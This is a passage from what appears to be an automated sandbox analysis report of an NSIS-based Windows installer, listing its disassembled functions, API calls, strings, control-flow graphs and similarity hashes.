                                                                                                                                  • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                  • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                  • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                  • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                  • Call: %d, xrefs: 0040165A
                                                                                                                                  • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                  • detailprint: %s, xrefs: 00401679
                                                                                                                                  • Rename failed: %s, xrefs: 0040194B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                  • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                  • API String ID: 2872004960-3619442763
                                                                                                                                  • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                  • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                  • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                  • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                                                                                                  Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405645 GetDlgItem * 2 call 403d6b KiUserCallbackDispatcher call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 353 40564a-405652 328->353 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 353->327 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                  APIs
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                  • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                  • DestroyWindow.USER32 ref: 00405512
                                                                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 0040563D
                                                                                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                  • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                  • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                  • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3906175533-0
                                                                                                                                  • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                  • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                  • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                  • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                                                                                                  Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                    • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                    • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                  • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                  • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                  • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                  • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                    • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                  • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                  • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                    • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                  • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                  • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                  • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                  • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                  • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                  • API String ID: 608394941-2746725676
                                                                                                                                  • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                  • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                  • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                  • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                                                                                                  Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                  • lstrcatW.KERNEL32(00000000,00000000,183,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,183,183,00000000,00000000,183,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                    • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425979,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425979,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                    • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425979,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                    • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                  • String ID: 183$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                                                                  • API String ID: 4286501637-2505658019
                                                                                                                                  • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                  • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                  • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                  • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                                                                                                  Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                    • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                    • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                  Strings
                                                                                                                                  • Error launching installer, xrefs: 00403603
                                                                                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                  • soft, xrefs: 004036A1
                                                                                                                                  • Inst, xrefs: 00403698
                                                                                                                                  • Null, xrefs: 004036AA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                  • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                  • API String ID: 4283519449-527102705
                                                                                                                                  • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                  • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                  • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                  • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                                                                                                  Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 175fileCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                  • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                  • wsprintfW.USER32 ref: 004034CE
                                                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00425979,00403792,00000000), ref: 004034FF
                                                                                                                                  • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1772012648.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1772000007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772026555.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772040682.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1772158208.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountFileTickWrite$wsprintf
                                                                                                                                  • String ID: (]C$... %d%%$pAB$yYB
                                                                                                                                  • API String ID: 651206458-4203522772
                                                                                                                                  • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                  • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                  • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
